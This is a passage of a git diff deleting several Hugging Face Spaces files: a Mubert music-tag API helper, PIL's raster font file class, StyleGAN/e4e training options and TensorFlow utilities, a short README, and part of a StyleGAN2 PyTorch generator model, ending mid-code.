6fab4572bdf1e1bfb56c47f17093e9f3a2d087e9..0000000000000000000000000000000000000000 --- a/spaces/DGSpitzer/TXT-2-IMG-2-MUSIC-2-VIDEO-w-RIFFUSION/utils.py +++ /dev/null @@ -1,50 +0,0 @@ -import json -import numpy as np -import httpx - -from constants import MUBERT_TAGS, MUBERT_LICENSE, MUBERT_MODE, MUBERT_TOKEN - - -def get_mubert_tags_embeddings(w2v_model): - return w2v_model.encode(MUBERT_TAGS) - - -def get_pat(email: str): - r = httpx.post('https://api-b2b.mubert.com/v2/GetServiceAccess', - json={ - "method": "GetServiceAccess", - "params": { - "email": email, - "license": MUBERT_LICENSE, - "token": MUBERT_TOKEN, - "mode": MUBERT_MODE, - } - }) - - rdata = json.loads(r.text) - assert rdata['status'] == 1, "probably incorrect e-mail" - pat = rdata['data']['pat'] - return pat - - -def find_similar(em, embeddings, method='cosine'): - scores = [] - for ref in embeddings: - if method == 'cosine': - scores.append(1 - np.dot(ref, em) / (np.linalg.norm(ref) * np.linalg.norm(em))) - if method == 'norm': - scores.append(np.linalg.norm(ref - em)) - return np.array(scores), np.argsort(scores) - - -def get_tags_for_prompts(w2v_model, mubert_tags_embeddings, prompts, top_n=3, debug=False): - prompts_embeddings = w2v_model.encode(prompts) - ret = [] - for i, pe in enumerate(prompts_embeddings): - scores, idxs = find_similar(pe, mubert_tags_embeddings) - top_tags = MUBERT_TAGS[idxs[:top_n]] - top_prob = 1 - scores[idxs[:top_n]] - if debug: - print(f"Prompt: {prompts[i]}\nTags: {', '.join(top_tags)}\nScores: {top_prob}\n\n\n") - ret.append((prompts[i], list(top_tags))) - return ret \ No newline at end of file diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/PIL/FontFile.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/PIL/FontFile.py deleted file mode 100644 index 5ec0a6632e3182382467688662ebc5e6c324da91..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/PIL/FontFile.py +++ /dev/null @@ -1,110 +0,0 @@ -# -# The Python Imaging Library -# $Id$ -# -# base class for raster font file parsers -# -# history: -# 1997-06-05 fl created -# 1997-08-19 fl restrict image width -# -# Copyright (c) 1997-1998 by Secret Labs AB -# Copyright (c) 1997-1998 by Fredrik Lundh -# -# See the README file for information on usage and redistribution. -# - - -import os - -from . 
import Image, _binary - -WIDTH = 800 - - -def puti16(fp, values): - """Write network order (big-endian) 16-bit sequence""" - for v in values: - if v < 0: - v += 65536 - fp.write(_binary.o16be(v)) - - -class FontFile: - """Base class for raster font file handlers.""" - - bitmap = None - - def __init__(self): - self.info = {} - self.glyph = [None] * 256 - - def __getitem__(self, ix): - return self.glyph[ix] - - def compile(self): - """Create metrics and bitmap""" - - if self.bitmap: - return - - # create bitmap large enough to hold all data - h = w = maxwidth = 0 - lines = 1 - for glyph in self: - if glyph: - d, dst, src, im = glyph - h = max(h, src[3] - src[1]) - w = w + (src[2] - src[0]) - if w > WIDTH: - lines += 1 - w = src[2] - src[0] - maxwidth = max(maxwidth, w) - - xsize = maxwidth - ysize = lines * h - - if xsize == 0 and ysize == 0: - return "" - - self.ysize = h - - # paste glyphs into bitmap - self.bitmap = Image.new("1", (xsize, ysize)) - self.metrics = [None] * 256 - x = y = 0 - for i in range(256): - glyph = self[i] - if glyph: - d, dst, src, im = glyph - xx = src[2] - src[0] - # yy = src[3] - src[1] - x0, y0 = x, y - x = x + xx - if x > WIDTH: - x, y = 0, y + h - x0, y0 = x, y - x = xx - s = src[0] + x0, src[1] + y0, src[2] + x0, src[3] + y0 - self.bitmap.paste(im.crop(src), s) - self.metrics[i] = d, dst, s - - def save(self, filename): - """Save font""" - - self.compile() - - # font data - self.bitmap.save(os.path.splitext(filename)[0] + ".pbm", "PNG") - - # font metrics - with open(os.path.splitext(filename)[0] + ".pil", "wb") as fp: - fp.write(b"PILfont\n") - fp.write(f";;;;;;{self.ysize};\n".encode("ascii")) # HACK!!! - fp.write(b"DATA\n") - for id in range(256): - m = self.metrics[id] - if not m: - puti16(fp, [0] * 10) - else: - puti16(fp, m[0] + m[1] + m[2]) diff --git a/spaces/Datasculptor/StyleGAN-NADA/e4e/options/train_options.py b/spaces/Datasculptor/StyleGAN-NADA/e4e/options/train_options.py deleted file mode 100644 index 583ea1423fdc9a649cd7044d74d554bf0ac2bf51..0000000000000000000000000000000000000000 --- a/spaces/Datasculptor/StyleGAN-NADA/e4e/options/train_options.py +++ /dev/null @@ -1,84 +0,0 @@ -from argparse import ArgumentParser -from configs.paths_config import model_paths - - -class TrainOptions: - - def __init__(self): - self.parser = ArgumentParser() - self.initialize() - - def initialize(self): - self.parser.add_argument('--exp_dir', type=str, help='Path to experiment output directory') - self.parser.add_argument('--dataset_type', default='ffhq_encode', type=str, - help='Type of dataset/experiment to run') - self.parser.add_argument('--encoder_type', default='Encoder4Editing', type=str, help='Which encoder to use') - - self.parser.add_argument('--batch_size', default=4, type=int, help='Batch size for training') - self.parser.add_argument('--test_batch_size', default=2, type=int, help='Batch size for testing and inference') - self.parser.add_argument('--workers', default=4, type=int, help='Number of train dataloader workers') - self.parser.add_argument('--test_workers', default=2, type=int, - help='Number of test/inference dataloader workers') - - self.parser.add_argument('--learning_rate', default=0.0001, type=float, help='Optimizer learning rate') - self.parser.add_argument('--optim_name', default='ranger', type=str, help='Which optimizer to use') - self.parser.add_argument('--train_decoder', default=False, type=bool, help='Whether to train the decoder model') - self.parser.add_argument('--start_from_latent_avg', action='store_true', - help='Whether 
to add average latent vector to generate codes from encoder.') - self.parser.add_argument('--lpips_type', default='alex', type=str, help='LPIPS backbone') - - self.parser.add_argument('--lpips_lambda', default=0.8, type=float, help='LPIPS loss multiplier factor') - self.parser.add_argument('--id_lambda', default=0.1, type=float, help='ID loss multiplier factor') - self.parser.add_argument('--l2_lambda', default=1.0, type=float, help='L2 loss multiplier factor') - - self.parser.add_argument('--stylegan_weights', default=model_paths['stylegan_ffhq'], type=str, - help='Path to StyleGAN model weights') - self.parser.add_argument('--stylegan_size', default=1024, type=int, - help='size of pretrained StyleGAN Generator') - self.parser.add_argument('--checkpoint_path', default=None, type=str, help='Path to pSp model checkpoint') - - self.parser.add_argument('--max_steps', default=500000, type=int, help='Maximum number of training steps') - self.parser.add_argument('--image_interval', default=100, type=int, - help='Interval for logging train images during training') - self.parser.add_argument('--board_interval', default=50, type=int, - help='Interval for logging metrics to tensorboard') - self.parser.add_argument('--val_interval', default=1000, type=int, help='Validation interval') - self.parser.add_argument('--save_interval', default=None, type=int, help='Model checkpoint interval') - - # Discriminator flags - self.parser.add_argument('--w_discriminator_lambda', default=0, type=float, help='Dw loss multiplier') - self.parser.add_argument('--w_discriminator_lr', default=2e-5, type=float, help='Dw learning rate') - self.parser.add_argument("--r1", type=float, default=10, help="weight of the r1 regularization") - self.parser.add_argument("--d_reg_every", type=int, default=16, - help="interval for applying r1 regularization") - self.parser.add_argument('--use_w_pool', action='store_true', - help='Whether to store a latnet codes pool for the discriminator\'s training') - self.parser.add_argument("--w_pool_size", type=int, default=50, - help="W\'s pool size, depends on --use_w_pool") - - # e4e specific - self.parser.add_argument('--delta_norm', type=int, default=2, help="norm type of the deltas") - self.parser.add_argument('--delta_norm_lambda', type=float, default=2e-4, help="lambda for delta norm loss") - - # Progressive training - self.parser.add_argument('--progressive_steps', nargs='+', type=int, default=None, - help="The training steps of training new deltas. 
steps[i] starts the delta_i training") - self.parser.add_argument('--progressive_start', type=int, default=None, - help="The training step to start training the deltas, overrides progressive_steps") - self.parser.add_argument('--progressive_step_every', type=int, default=2_000, - help="Amount of training steps for each progressive step") - - # Save additional training info to enable future training continuation from produced checkpoints - self.parser.add_argument('--save_training_data', action='store_true', - help='Save intermediate training data to resume training from the checkpoint') - self.parser.add_argument('--sub_exp_dir', default=None, type=str, help='Name of sub experiment directory') - self.parser.add_argument('--keep_optimizer', action='store_true', - help='Whether to continue from the checkpoint\'s optimizer') - self.parser.add_argument('--resume_training_from_ckpt', default=None, type=str, - help='Path to training checkpoint, works when --save_training_data was set to True') - self.parser.add_argument('--update_param_list', nargs='+', type=str, default=None, - help="Name of training parameters to update the loaded training checkpoint") - - def parse(self): - opts = self.parser.parse_args() - return opts diff --git a/spaces/Devika/Briefly/README.md b/spaces/Devika/Briefly/README.md deleted file mode 100644 index eae276712932515b8895ed5b5212c364e7af2dcb..0000000000000000000000000000000000000000 --- a/spaces/Devika/Briefly/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Briefly -emoji: 🎯 -colorFrom: gray -colorTo: yellow -sdk: streamlit -app_file: app.py -pinned: false ---- - -# Briefly -Read trending news in less than 60 words. diff --git a/spaces/Dinoking/Guccio-AI-Designer/models/stylegan/stylegan_tf/dnnlib/tflib/tfutil.py b/spaces/Dinoking/Guccio-AI-Designer/models/stylegan/stylegan_tf/dnnlib/tflib/tfutil.py deleted file mode 100644 index a431a4d4d18a32c9cd44a14ce89f35e038dc312c..0000000000000000000000000000000000000000 --- a/spaces/Dinoking/Guccio-AI-Designer/models/stylegan/stylegan_tf/dnnlib/tflib/tfutil.py +++ /dev/null @@ -1,240 +0,0 @@ -# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. -# -# This work is licensed under the Creative Commons Attribution-NonCommercial -# 4.0 International License. To view a copy of this license, visit -# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to -# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. 
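# ---------------------------------------------------------------------------
# Illustrative usage sketch (an annotation added here, not part of the deleted
# file). It shows how the helpers below are typically reached through
# dnnlib.tflib: init_tf() creates the default session from a config dict whose
# keys mirror _sanitize_tf_config(), and convert_images_to_uint8() is usually
# passed as an output transform to Network.run(). `Gs` (a pre-loaded generator
# network) and the latent shape are assumptions, not defined in this module.
import numpy as np
import dnnlib.tflib as tflib

tflib.init_tf({"rnd.np_random_seed": 123,          # seed NumPy and TensorFlow
               "gpu_options.allow_growth": True})  # grab GPU memory lazily

latents = np.random.randn(1, 512)                  # hypothetical latent batch
fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
# images = Gs.run(latents, None, output_transform=fmt)  # `Gs` is assumed
# ---------------------------------------------------------------------------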
- -"""Miscellaneous helper utils for Tensorflow.""" - -import os -import numpy as np -import tensorflow as tf - -from typing import Any, Iterable, List, Union - -TfExpression = Union[tf.Tensor, tf.Variable, tf.Operation] -"""A type that represents a valid Tensorflow expression.""" - -TfExpressionEx = Union[TfExpression, int, float, np.ndarray] -"""A type that can be converted to a valid Tensorflow expression.""" - - -def run(*args, **kwargs) -> Any: - """Run the specified ops in the default session.""" - assert_tf_initialized() - return tf.get_default_session().run(*args, **kwargs) - - -def is_tf_expression(x: Any) -> bool: - """Check whether the input is a valid Tensorflow expression, i.e., Tensorflow Tensor, Variable, or Operation.""" - return isinstance(x, (tf.Tensor, tf.Variable, tf.Operation)) - - -def shape_to_list(shape: Iterable[tf.Dimension]) -> List[Union[int, None]]: - """Convert a Tensorflow shape to a list of ints.""" - return [dim.value for dim in shape] - - -def flatten(x: TfExpressionEx) -> TfExpression: - """Shortcut function for flattening a tensor.""" - with tf.name_scope("Flatten"): - return tf.reshape(x, [-1]) - - -def log2(x: TfExpressionEx) -> TfExpression: - """Logarithm in base 2.""" - with tf.name_scope("Log2"): - return tf.log(x) * np.float32(1.0 / np.log(2.0)) - - -def exp2(x: TfExpressionEx) -> TfExpression: - """Exponent in base 2.""" - with tf.name_scope("Exp2"): - return tf.exp(x * np.float32(np.log(2.0))) - - -def lerp(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpressionEx: - """Linear interpolation.""" - with tf.name_scope("Lerp"): - return a + (b - a) * t - - -def lerp_clip(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpression: - """Linear interpolation with clip.""" - with tf.name_scope("LerpClip"): - return a + (b - a) * tf.clip_by_value(t, 0.0, 1.0) - - -def absolute_name_scope(scope: str) -> tf.name_scope: - """Forcefully enter the specified name scope, ignoring any surrounding scopes.""" - return tf.name_scope(scope + "/") - - -def absolute_variable_scope(scope: str, **kwargs) -> tf.variable_scope: - """Forcefully enter the specified variable scope, ignoring any surrounding scopes.""" - return tf.variable_scope(tf.VariableScope(name=scope, **kwargs), auxiliary_name_scope=False) - - -def _sanitize_tf_config(config_dict: dict = None) -> dict: - # Defaults. - cfg = dict() - cfg["rnd.np_random_seed"] = None # Random seed for NumPy. None = keep as is. - cfg["rnd.tf_random_seed"] = "auto" # Random seed for TensorFlow. 'auto' = derive from NumPy random state. None = keep as is. - cfg["env.TF_CPP_MIN_LOG_LEVEL"] = "1" # 0 = Print all available debug info from TensorFlow. 1 = Print warnings and errors, but disable debug info. - cfg["graph_options.place_pruned_graph"] = True # False = Check that all ops are available on the designated device. True = Skip the check for ops that are not used. - cfg["gpu_options.allow_growth"] = True # False = Allocate all GPU memory at the beginning. True = Allocate only as much GPU memory as needed. - - # User overrides. - if config_dict is not None: - cfg.update(config_dict) - return cfg - - -def init_tf(config_dict: dict = None) -> None: - """Initialize TensorFlow session using good default settings.""" - # Skip if already initialized. - if tf.get_default_session() is not None: - return - - # Setup config dict and random seeds. 
- cfg = _sanitize_tf_config(config_dict) - np_random_seed = cfg["rnd.np_random_seed"] - if np_random_seed is not None: - np.random.seed(np_random_seed) - tf_random_seed = cfg["rnd.tf_random_seed"] - if tf_random_seed == "auto": - tf_random_seed = np.random.randint(1 << 31) - if tf_random_seed is not None: - tf.set_random_seed(tf_random_seed) - - # Setup environment variables. - for key, value in list(cfg.items()): - fields = key.split(".") - if fields[0] == "env": - assert len(fields) == 2 - os.environ[fields[1]] = str(value) - - # Create default TensorFlow session. - create_session(cfg, force_as_default=True) - - -def assert_tf_initialized(): - """Check that TensorFlow session has been initialized.""" - if tf.get_default_session() is None: - raise RuntimeError("No default TensorFlow session found. Please call dnnlib.tflib.init_tf().") - - -def create_session(config_dict: dict = None, force_as_default: bool = False) -> tf.Session: - """Create tf.Session based on config dict.""" - # Setup TensorFlow config proto. - cfg = _sanitize_tf_config(config_dict) - config_proto = tf.ConfigProto() - for key, value in cfg.items(): - fields = key.split(".") - if fields[0] not in ["rnd", "env"]: - obj = config_proto - for field in fields[:-1]: - obj = getattr(obj, field) - setattr(obj, fields[-1], value) - - # Create session. - session = tf.Session(config=config_proto) - if force_as_default: - # pylint: disable=protected-access - session._default_session = session.as_default() - session._default_session.enforce_nesting = False - session._default_session.__enter__() # pylint: disable=no-member - - return session - - -def init_uninitialized_vars(target_vars: List[tf.Variable] = None) -> None: - """Initialize all tf.Variables that have not already been initialized. - - Equivalent to the following, but more efficient and does not bloat the tf graph: - tf.variables_initializer(tf.report_uninitialized_variables()).run() - """ - assert_tf_initialized() - if target_vars is None: - target_vars = tf.global_variables() - - test_vars = [] - test_ops = [] - - with tf.control_dependencies(None): # ignore surrounding control_dependencies - for var in target_vars: - assert is_tf_expression(var) - - try: - tf.get_default_graph().get_tensor_by_name(var.name.replace(":0", "/IsVariableInitialized:0")) - except KeyError: - # Op does not exist => variable may be uninitialized. - test_vars.append(var) - - with absolute_name_scope(var.name.split(":")[0]): - test_ops.append(tf.is_variable_initialized(var)) - - init_vars = [var for var, inited in zip(test_vars, run(test_ops)) if not inited] - run([var.initializer for var in init_vars]) - - -def set_vars(var_to_value_dict: dict) -> None: - """Set the values of given tf.Variables. 
- - Equivalent to the following, but more efficient and does not bloat the tf graph: - tflib.run([tf.assign(var, value) for var, value in var_to_value_dict.items()] - """ - assert_tf_initialized() - ops = [] - feed_dict = {} - - for var, value in var_to_value_dict.items(): - assert is_tf_expression(var) - - try: - setter = tf.get_default_graph().get_tensor_by_name(var.name.replace(":0", "/setter:0")) # look for existing op - except KeyError: - with absolute_name_scope(var.name.split(":")[0]): - with tf.control_dependencies(None): # ignore surrounding control_dependencies - setter = tf.assign(var, tf.placeholder(var.dtype, var.shape, "new_value"), name="setter") # create new setter - - ops.append(setter) - feed_dict[setter.op.inputs[1]] = value - - run(ops, feed_dict) - - -def create_var_with_large_initial_value(initial_value: np.ndarray, *args, **kwargs): - """Create tf.Variable with large initial value without bloating the tf graph.""" - assert_tf_initialized() - assert isinstance(initial_value, np.ndarray) - zeros = tf.zeros(initial_value.shape, initial_value.dtype) - var = tf.Variable(zeros, *args, **kwargs) - set_vars({var: initial_value}) - return var - - -def convert_images_from_uint8(images, drange=[-1,1], nhwc_to_nchw=False): - """Convert a minibatch of images from uint8 to float32 with configurable dynamic range. - Can be used as an input transformation for Network.run(). - """ - images = tf.cast(images, tf.float32) - if nhwc_to_nchw: - images = tf.transpose(images, [0, 3, 1, 2]) - return (images - drange[0]) * ((drange[1] - drange[0]) / 255) - - -def convert_images_to_uint8(images, drange=[-1,1], nchw_to_nhwc=False, shrink=1): - """Convert a minibatch of images from float32 to uint8 with configurable dynamic range. - Can be used as an output transformation for Network.run(). 
- """ - images = tf.cast(images, tf.float32) - if shrink > 1: - ksize = [1, 1, shrink, shrink] - images = tf.nn.avg_pool(images, ksize=ksize, strides=ksize, padding="VALID", data_format="NCHW") - if nchw_to_nhwc: - images = tf.transpose(images, [0, 2, 3, 1]) - scale = 255 / (drange[1] - drange[0]) - images = images * scale + (0.5 - drange[0] * scale) - return tf.saturate_cast(images, tf.uint8) diff --git a/spaces/Dinoking/Guccio-AI-Designer/models/stylegan2/stylegan2-pytorch/model.py b/spaces/Dinoking/Guccio-AI-Designer/models/stylegan2/stylegan2-pytorch/model.py deleted file mode 100644 index 4e3c9687a3f4f7301cf053bee95c1e288b1c939b..0000000000000000000000000000000000000000 --- a/spaces/Dinoking/Guccio-AI-Designer/models/stylegan2/stylegan2-pytorch/model.py +++ /dev/null @@ -1,703 +0,0 @@ -import math -import random -import functools -import operator - -import torch -from torch import nn -from torch.nn import functional as F -from torch.autograd import Function - -from op import FusedLeakyReLU, fused_leaky_relu, upfirdn2d - - -class PixelNorm(nn.Module): - def __init__(self): - super().__init__() - - def forward(self, input): - return input * torch.rsqrt(torch.mean(input ** 2, dim=1, keepdim=True) + 1e-8) - - -def make_kernel(k): - k = torch.tensor(k, dtype=torch.float32) - - if k.ndim == 1: - k = k[None, :] * k[:, None] - - k /= k.sum() - - return k - - -class Upsample(nn.Module): - def __init__(self, kernel, factor=2): - super().__init__() - - self.factor = factor - kernel = make_kernel(kernel) * (factor ** 2) - self.register_buffer('kernel', kernel) - - p = kernel.shape[0] - factor - - pad0 = (p + 1) // 2 + factor - 1 - pad1 = p // 2 - - self.pad = (pad0, pad1) - - def forward(self, input): - out = upfirdn2d(input, self.kernel, up=self.factor, down=1, pad=self.pad) - - return out - - -class Downsample(nn.Module): - def __init__(self, kernel, factor=2): - super().__init__() - - self.factor = factor - kernel = make_kernel(kernel) - self.register_buffer('kernel', kernel) - - p = kernel.shape[0] - factor - - pad0 = (p + 1) // 2 - pad1 = p // 2 - - self.pad = (pad0, pad1) - - def forward(self, input): - out = upfirdn2d(input, self.kernel, up=1, down=self.factor, pad=self.pad) - - return out - - -class Blur(nn.Module): - def __init__(self, kernel, pad, upsample_factor=1): - super().__init__() - - kernel = make_kernel(kernel) - - if upsample_factor > 1: - kernel = kernel * (upsample_factor ** 2) - - self.register_buffer('kernel', kernel) - - self.pad = pad - - def forward(self, input): - out = upfirdn2d(input, self.kernel, pad=self.pad) - - return out - - -class EqualConv2d(nn.Module): - def __init__( - self, in_channel, out_channel, kernel_size, stride=1, padding=0, bias=True - ): - super().__init__() - - self.weight = nn.Parameter( - torch.randn(out_channel, in_channel, kernel_size, kernel_size) - ) - self.scale = 1 / math.sqrt(in_channel * kernel_size ** 2) - - self.stride = stride - self.padding = padding - - if bias: - self.bias = nn.Parameter(torch.zeros(out_channel)) - - else: - self.bias = None - - def forward(self, input): - out = F.conv2d( - input, - self.weight * self.scale, - bias=self.bias, - stride=self.stride, - padding=self.padding, - ) - - return out - - def __repr__(self): - return ( - f'{self.__class__.__name__}({self.weight.shape[1]}, {self.weight.shape[0]},' - f' {self.weight.shape[2]}, stride={self.stride}, padding={self.padding})' - ) - - -class EqualLinear(nn.Module): - def __init__( - self, in_dim, out_dim, bias=True, bias_init=0, lr_mul=1, activation=None - ): - 
super().__init__() - - self.weight = nn.Parameter(torch.randn(out_dim, in_dim).div_(lr_mul)) - - if bias: - self.bias = nn.Parameter(torch.zeros(out_dim).fill_(bias_init)) - - else: - self.bias = None - - self.activation = activation - - self.scale = (1 / math.sqrt(in_dim)) * lr_mul - self.lr_mul = lr_mul - - def forward(self, input): - if self.activation: - out = F.linear(input, self.weight * self.scale) - out = fused_leaky_relu(out, self.bias * self.lr_mul) - - else: - out = F.linear( - input, self.weight * self.scale, bias=self.bias * self.lr_mul - ) - - return out - - def __repr__(self): - return ( - f'{self.__class__.__name__}({self.weight.shape[1]}, {self.weight.shape[0]})' - ) - - -class ScaledLeakyReLU(nn.Module): - def __init__(self, negative_slope=0.2): - super().__init__() - - self.negative_slope = negative_slope - - def forward(self, input): - out = F.leaky_relu(input, negative_slope=self.negative_slope) - - return out * math.sqrt(2) - - -class ModulatedConv2d(nn.Module): - def __init__( - self, - in_channel, - out_channel, - kernel_size, - style_dim, - demodulate=True, - upsample=False, - downsample=False, - blur_kernel=[1, 3, 3, 1], - ): - super().__init__() - - self.eps = 1e-8 - self.kernel_size = kernel_size - self.in_channel = in_channel - self.out_channel = out_channel - self.upsample = upsample - self.downsample = downsample - - if upsample: - factor = 2 - p = (len(blur_kernel) - factor) - (kernel_size - 1) - pad0 = (p + 1) // 2 + factor - 1 - pad1 = p // 2 + 1 - - self.blur = Blur(blur_kernel, pad=(pad0, pad1), upsample_factor=factor) - - if downsample: - factor = 2 - p = (len(blur_kernel) - factor) + (kernel_size - 1) - pad0 = (p + 1) // 2 - pad1 = p // 2 - - self.blur = Blur(blur_kernel, pad=(pad0, pad1)) - - fan_in = in_channel * kernel_size ** 2 - self.scale = 1 / math.sqrt(fan_in) - self.padding = kernel_size // 2 - - self.weight = nn.Parameter( - torch.randn(1, out_channel, in_channel, kernel_size, kernel_size) - ) - - self.modulation = EqualLinear(style_dim, in_channel, bias_init=1) - - self.demodulate = demodulate - - def __repr__(self): - return ( - f'{self.__class__.__name__}({self.in_channel}, {self.out_channel}, {self.kernel_size}, ' - f'upsample={self.upsample}, downsample={self.downsample})' - ) - - def forward(self, input, style): - batch, in_channel, height, width = input.shape - - style = self.modulation(style).view(batch, 1, in_channel, 1, 1) - weight = self.scale * self.weight * style - - if self.demodulate: - demod = torch.rsqrt(weight.pow(2).sum([2, 3, 4]) + 1e-8) - weight = weight * demod.view(batch, self.out_channel, 1, 1, 1) - - weight = weight.view( - batch * self.out_channel, in_channel, self.kernel_size, self.kernel_size - ) - - if self.upsample: - input = input.view(1, batch * in_channel, height, width) - weight = weight.view( - batch, self.out_channel, in_channel, self.kernel_size, self.kernel_size - ) - weight = weight.transpose(1, 2).reshape( - batch * in_channel, self.out_channel, self.kernel_size, self.kernel_size - ) - out = F.conv_transpose2d(input, weight, padding=0, stride=2, groups=batch) - _, _, height, width = out.shape - out = out.view(batch, self.out_channel, height, width) - out = self.blur(out) - - elif self.downsample: - input = self.blur(input) - _, _, height, width = input.shape - input = input.view(1, batch * in_channel, height, width) - out = F.conv2d(input, weight, padding=0, stride=2, groups=batch) - _, _, height, width = out.shape - out = out.view(batch, self.out_channel, height, width) - - else: - input = 
input.view(1, batch * in_channel, height, width) - out = F.conv2d(input, weight, padding=self.padding, groups=batch) - _, _, height, width = out.shape - out = out.view(batch, self.out_channel, height, width) - - return out - - -class NoiseInjection(nn.Module): - def __init__(self): - super().__init__() - - self.weight = nn.Parameter(torch.zeros(1)) - - def forward(self, image, noise=None): - if noise is None: - batch, _, height, width = image.shape - noise = image.new_empty(batch, 1, height, width).normal_() - - return image + self.weight * noise - - -class ConstantInput(nn.Module): - def __init__(self, channel, size=4): - super().__init__() - - self.input = nn.Parameter(torch.randn(1, channel, size, size)) - - def forward(self, input): - batch = input.shape[0] - out = self.input.repeat(batch, 1, 1, 1) - - return out - - -class StyledConv(nn.Module): - def __init__( - self, - in_channel, - out_channel, - kernel_size, - style_dim, - upsample=False, - blur_kernel=[1, 3, 3, 1], - demodulate=True, - ): - super().__init__() - - self.conv = ModulatedConv2d( - in_channel, - out_channel, - kernel_size, - style_dim, - upsample=upsample, - blur_kernel=blur_kernel, - demodulate=demodulate, - ) - - self.noise = NoiseInjection() - # self.bias = nn.Parameter(torch.zeros(1, out_channel, 1, 1)) - # self.activate = ScaledLeakyReLU(0.2) - self.activate = FusedLeakyReLU(out_channel) - - def forward(self, input, style, noise=None): - out = self.conv(input, style) - out = self.noise(out, noise=noise) - # out = out + self.bias - out = self.activate(out) - - return out - - -class ToRGB(nn.Module): - def __init__(self, in_channel, style_dim, upsample=True, blur_kernel=[1, 3, 3, 1]): - super().__init__() - - if upsample: - self.upsample = Upsample(blur_kernel) - - self.conv = ModulatedConv2d(in_channel, 3, 1, style_dim, demodulate=False) - self.bias = nn.Parameter(torch.zeros(1, 3, 1, 1)) - - def forward(self, input, style, skip=None): - out = self.conv(input, style) - out = out + self.bias - - if skip is not None: - skip = self.upsample(skip) - - out = out + skip - - return out - -# Wrapper that gives name to tensor -class NamedTensor(nn.Module): - def __init__(self): - super().__init__() - - def forward(self, x): - return x - -# Give each style a unique name -class StridedStyle(nn.ModuleList): - def __init__(self, n_latents): - super().__init__([NamedTensor() for _ in range(n_latents)]) - self.n_latents = n_latents - - def forward(self, x): - # x already strided - styles = [self[i](x[:, i, :]) for i in range(self.n_latents)] - return torch.stack(styles, dim=1) - -class Generator(nn.Module): - def __init__( - self, - size, - style_dim, - n_mlp, - channel_multiplier=2, - blur_kernel=[1, 3, 3, 1], - lr_mlp=0.01, - ): - super().__init__() - - self.size = size - - self.style_dim = style_dim - - layers = [PixelNorm()] - - for i in range(n_mlp): - layers.append( - EqualLinear( - style_dim, style_dim, lr_mul=lr_mlp, activation='fused_lrelu' - ) - ) - - self.style = nn.Sequential(*layers) - - self.channels = { - 4: 512, - 8: 512, - 16: 512, - 32: 512, - 64: 256 * channel_multiplier, - 128: 128 * channel_multiplier, - 256: 64 * channel_multiplier, - 512: 32 * channel_multiplier, - 1024: 16 * channel_multiplier, - } - - self.input = ConstantInput(self.channels[4]) - self.conv1 = StyledConv( - self.channels[4], self.channels[4], 3, style_dim, blur_kernel=blur_kernel - ) - self.to_rgb1 = ToRGB(self.channels[4], style_dim, upsample=False) - - self.log_size = int(math.log(size, 2)) - self.num_layers = (self.log_size - 2) * 2 + 
1 - - self.convs = nn.ModuleList() - self.upsamples = nn.ModuleList() - self.to_rgbs = nn.ModuleList() - self.noises = nn.Module() - - in_channel = self.channels[4] - - for layer_idx in range(self.num_layers): - res = (layer_idx + 5) // 2 - shape = [1, 1, 2 ** res, 2 ** res] - self.noises.register_buffer(f'noise_{layer_idx}', torch.randn(*shape)) - - for i in range(3, self.log_size + 1): - out_channel = self.channels[2 ** i] - - self.convs.append( - StyledConv( - in_channel, - out_channel, - 3, - style_dim, - upsample=True, - blur_kernel=blur_kernel, - ) - ) - - self.convs.append( - StyledConv( - out_channel, out_channel, 3, style_dim, blur_kernel=blur_kernel - ) - ) - - self.to_rgbs.append(ToRGB(out_channel, style_dim)) - - in_channel = out_channel - - self.n_latent = self.log_size * 2 - 2 - self.strided_style = StridedStyle(self.n_latent) - - def make_noise(self): - device = self.input.input.device - - noises = [torch.randn(1, 1, 2 ** 2, 2 ** 2, device=device)] - - for i in range(3, self.log_size + 1): - for _ in range(2): - noises.append(torch.randn(1, 1, 2 ** i, 2 ** i, device=device)) - - return noises - - def mean_latent(self, n_latent): - latent_in = torch.randn( - n_latent, self.style_dim, device=self.input.input.device - ) - latent = self.style(latent_in).mean(0, keepdim=True) - - return latent - - def get_latent(self, input): - return self.style(input) - - def forward( - self, - styles, - return_latents=False, - inject_index=None, - truncation=1, - truncation_latent=None, - input_is_w=False, - noise=None, - randomize_noise=True, - ): - if not input_is_w: - styles = [self.style(s) for s in styles] - - if noise is None: - if randomize_noise: - noise = [None] * self.num_layers - else: - noise = [ - getattr(self.noises, f'noise_{i}') for i in range(self.num_layers) - ] - - if truncation < 1: - style_t = [] - - for style in styles: - style_t.append( - truncation_latent + truncation * (style - truncation_latent) - ) - - styles = style_t - - if len(styles) == 1: - # One global latent - inject_index = self.n_latent - - if styles[0].ndim < 3: - latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) - - else: - latent = styles[0] - - elif len(styles) == 2: - # Latent mixing with two latents - if inject_index is None: - inject_index = random.randint(1, self.n_latent - 1) - - latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) - latent2 = styles[1].unsqueeze(1).repeat(1, self.n_latent - inject_index, 1) - - latent = self.strided_style(torch.cat([latent, latent2], 1)) - else: - # One latent per layer - assert len(styles) == self.n_latent, f'Expected {self.n_latents} latents, got {len(styles)}' - styles = torch.stack(styles, dim=1) # [N, 18, 512] - latent = self.strided_style(styles) - - out = self.input(latent) - out = self.conv1(out, latent[:, 0], noise=noise[0]) - - skip = self.to_rgb1(out, latent[:, 1]) - - i = 1 - for conv1, conv2, noise1, noise2, to_rgb in zip( - self.convs[::2], self.convs[1::2], noise[1::2], noise[2::2], self.to_rgbs - ): - out = conv1(out, latent[:, i], noise=noise1) - out = conv2(out, latent[:, i + 1], noise=noise2) - skip = to_rgb(out, latent[:, i + 2], skip) - - i += 2 - - image = skip - - if return_latents: - return image, latent - - else: - return image, None - - -class ConvLayer(nn.Sequential): - def __init__( - self, - in_channel, - out_channel, - kernel_size, - downsample=False, - blur_kernel=[1, 3, 3, 1], - bias=True, - activate=True, - ): - layers = [] - - if downsample: - 